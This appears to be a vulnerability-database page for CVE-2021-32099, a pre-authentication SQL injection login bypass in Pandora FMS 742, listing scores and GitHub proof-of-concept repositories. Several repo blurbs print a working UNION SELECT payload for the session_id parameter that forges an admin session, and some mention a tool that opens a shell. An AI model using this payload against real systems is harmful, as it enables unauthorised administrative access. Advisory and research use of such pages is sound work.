7.5
CVSSv2

CVE-2021-32099

Published: 07/05/2021 Updated: 11/05/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 670
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated malicious user to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

Github Repositories

CVE-2021-32099 SQL Injection allow attacker bypass login. From HTB with love

CVE-2021-32099 SQLi Bypass login Useful when trying to read User Flag on Pandorahtb CVE-2021-32099 SQLi allow attacker bypass login Target Exploit on: Pandora FMS v70NG742_FIX_PERL2020 Analysis Read from cvedetail We know endpoint of target: localhost:8000/pandora_console/include/chart_generatorphp?session_id=PayloadHere => Access denied sqlmap -r reqtxt

CVE-2021-32099

CVE-2021-32099 pandora fms 742 sqli (pre authentication) POC localhost/pandora_console/include/chart_generatorphp?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1 URL Encoded localhost/pandora_console/include/chart_generator

Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell

CVE-2021-32099 Pandora_v70NG742 Unauthenticated Sqlinjection that leads to dump database but this one impersonated Admin and drops a interactive shell Official Blog by the Author Blog blogsonarsourcecom/pandora-fms-742-critical-code-vulnerabilities-explained Usage : usage: sqlpwnpy [-h] -t TARGET [-f FILENAME] Exploiting Sqlinjection To impersonate Admin optional

CVE-2021-32099

CVE-2021-32099 CVE-2021-32099 POC : localhost:8000/pandora_console/include/chart_generatorphp?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271 Deatil : blogsonarsourcecom/pandora-fms-742-critical-code-vulnerabilities-explained

Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell

CVE-2021-32099 Pandora_v70NG742 Unauthenticated Sqlinjection that leads to dump database but this one impersonated Admin and drops a interactive shell Official Blog by the Author Blog blogsonarsourcecom/pandora-fms-742-critical-code-vulnerabilities-explained Usage : usage: sqlpwnpy [-h] -t TARGET [-f FILENAME] Exploiting Sqlinjection To impersonate Admin optional